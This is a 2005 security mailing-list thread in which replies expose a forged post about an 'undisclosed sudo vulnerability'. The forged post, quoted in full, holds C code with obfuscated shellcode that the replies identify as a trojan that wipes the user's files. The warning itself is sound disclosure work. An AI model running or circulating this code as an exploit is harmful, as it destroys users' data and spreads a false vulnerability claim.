lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.58.0507302305030.2272@wvz-jiyna.cvpx.pynhfvat.hf>
Date: Sat, 30 Jul 2005 23:06:54 -0400 (EDT)
From: Jim Clausing <jclausing@....sans.org>
To: Kurt Seifried <listuser@...fried.org>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Undisclosed Sudo Vulnerability ?


Yeah and having talked to Joel, it was a pretty good forgery.  I'm pretty 
sure he doesn't use Lotus for his e-mail client and I know he wouldn't be 
sending to the list from ee.fju.edu.tw (140.136.145.2).

--
Jim Clausing
GCFA, GCIA, GCFW, GREM, CISSP, CCSA
GPG fingerprint = 30CE 6C98 E795 39FF 6E57  220B 342E E25C 852F 302B

On or about Sat, 30 Jul 2005, Kurt Seifried pontificated thusly:

> This is a trojan that will nuke all the files owned by the user running it.
> 
> -Kurt
> 
> ----- Original Message ----- 
> From: "Esler, Joel - Contractor" <joel.esler@...rt-s.army.mil>
> To: <full-disclosure@...ts.grok.org.uk>
> Sent: Saturday, July 30, 2005 12:40 PM
> Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
> 
> 
> > About two weeks ago, our proprietary LIDS detected some suspicious shell
> > activity on an internal .mil machine i am in charged of. Our server runs
> > latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
> > Before shutting down the machine and reinstalling it from scratch, we
> > installed sebek module to monitor all shell activity. Based on the data
> > we gathered, it seems the attacker gained root privileges using an
> > undisclosed bug in latest sudo.
> >
> > $ uname -a
> > Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 
> > GNU/Linux
> >
> > $ sudo -V
> > Sudo version 1.6.8p9
> >
> > $ ls -al /tmp/.phc
> > -rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc
> >
> > Here is an excerpt of a shell session we recorded:
> >
> > <.........>
> > $ cat >blaat.uue<<'EH'
> >
> 
> 
> --------------------------------------------------------------------------------
> 
> 
> > EH
> > $ uudecode blaat.uue
> > $ cat sudoh.c
> > /*
> > *  off by one ebp overwrite in sudo prompt parsing func (bground mode 
> > only)
> > *
> > *  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard 
> > Johnson
> > *
> > *  gcc -pipe -o sudoh sudoh.c ; ./sudoh
> > *
> > *  happy deathday route
> > *
> > */
> >
> > #include <stdio.h>
> > #include <unistd.h>
> > #include <string.h>
> > #include <alloca.h>
> >
> >
> > #define SUDO_PROMPT     "%u@%h> \\%"
> > #define shellcode       esp
> > #define RETS_NUM        246 /* generic */
> > #define NOPS_NUM        116 /* generic */
> >
> >
> > /*
> > *  Linux x86 non-interactive exec
> > *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
> > */
> >
> > char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
> >                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
> >                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
> >                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
> >                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
> >                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
> >                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
> >                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
> >                  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
> >             /* = "\xcc\xeb\xfe"; */
> >
> >
> >
> > void fill (char *buff, int size, unsigned long val)
> > {
> >        unsigned long *ptr = (unsigned long *) buff;
> >
> >        for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = 
> > val;
> > }
> >
> >
> > unsigned long get_sp (void)
> > {
> >        __asm__ ("lea esp, %eax");
> > }
> >
> >
> > char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
> > {
> >        int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen 
> > (shellcode);
> >        unsigned char *nops = alloca (nops_nums);
> >        unsigned char *rets = alloca (rets_nums);
> >        unsigned long ret = get_sp ();
> >        static char exp_buffer [8192];
> >
> >        /* make sure sudo isatty() fails */
> >        close (0); close (1); close (2);
> >
> >        fill (nops, (unsigned char) nops_nums, 0x90909090);
> >        fill (rets, (unsigned char) rets_nums, ret);
> >
> >        /* be nice plz */
> >        if (size > sizeof (exp_buffer)) {
> >                fprintf (stderr, "buffer's t00 small..\n");
> >                return NULL;
> >        }
> >
> >        snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
> >                  SUDO_PROMPT, /* evilz prompt */
> >                  nops,
> >                  shellcode,
> >                  rets);
> >
> >        /* exploit buff */
> >        return exp_buffer;
> > }
> >
> >
> >
> > int main(int argv, char *argc[])
> > {
> >        char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
> >
> >        /* thanks again T0dd :) */
> >
> >        execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, 
> > "/bin/false", NULL);
> >
> >        /* ok, shellroot should await you @ "HISTFILE=/dev/null 
> > /tmp/.phc -p" */
> >
> >        return 0;
> > }
> >
> > $ gcc -pipe -o sudoh sudoh.c
> > {standard input}: Assembler messages:
> > {standard input}:5: Warning: Ignoring changed section attributes for .text
> > $ ./sudoh
> > $ cat /bin/cat > blaat.uue; rm blaat.uue
> > $ cat /bin/cat > sudoh.c; rm sudoh.c
> > $ cat /bin/cat > sudoh; rm sudoh
> > $ HISTFILE=/dev/null /tmp/.phc -p
> > id
> > uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
> > <.........>
> >
> >
> > Todd Miller, the maintainer of Sudo has been informed yesterday, and it
> > is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
> >
> >
> > J
> >
> > Joel Esler, GCIA
> > joel.esler@...rt-s.army.mil
> > 706-791-7165 DSN: 780-7165
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> > 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ